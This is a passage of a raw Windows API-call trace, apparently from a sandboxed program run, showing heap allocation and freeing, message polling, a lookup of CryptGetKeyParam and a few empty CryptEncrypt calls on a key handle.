(in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0077.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.359] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0077.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0077.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0077.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0077.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0077.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f96a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.362] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0077.362] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0077.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0077.365] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0077.365] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.366] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.366] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.366] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.366] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.367] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.367] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.367] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.368] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.368] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.368] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.369] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.369] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.369] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 